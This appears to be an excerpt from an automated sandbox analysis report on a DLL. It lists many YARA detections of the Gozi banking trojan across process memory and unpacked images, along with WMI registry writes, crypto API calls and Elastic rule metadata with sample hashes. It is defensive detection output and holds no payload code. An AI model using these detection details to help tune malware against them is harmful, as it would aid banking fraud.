                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.41b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.4e194a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.e30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.317d710.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33aa838.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.265a5b8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.52a94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.295272461.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.764677569.000000000338A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289539905.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.765416875.00000000052A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280975249.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.281843853.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.764531787.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765596514.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765523462.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289930028.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.46b94a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.5400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.10000000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.26509a9.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.1137891.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.41b0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.4e194a0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.e30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.11414a0.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.317d710.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.11414a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33a0c29.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.33aa838.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.10000000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.rundll32.exe.265a5b8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.rundll32.exe.52a94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.loaddll32.exe.1137891.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.3173b01.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.295272461.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.764677569.000000000338A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289539905.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.765416875.00000000052A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.764952145.000000000315A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.280975249.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.281843853.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.764531787.000000000263A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.765596514.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.765523462.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.289930028.000000000112B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054047E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                System Summary

                barindex
                Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                Source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: cVZ5IwmAMe.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000002.765694444.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316551528.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334180777.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334226466.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
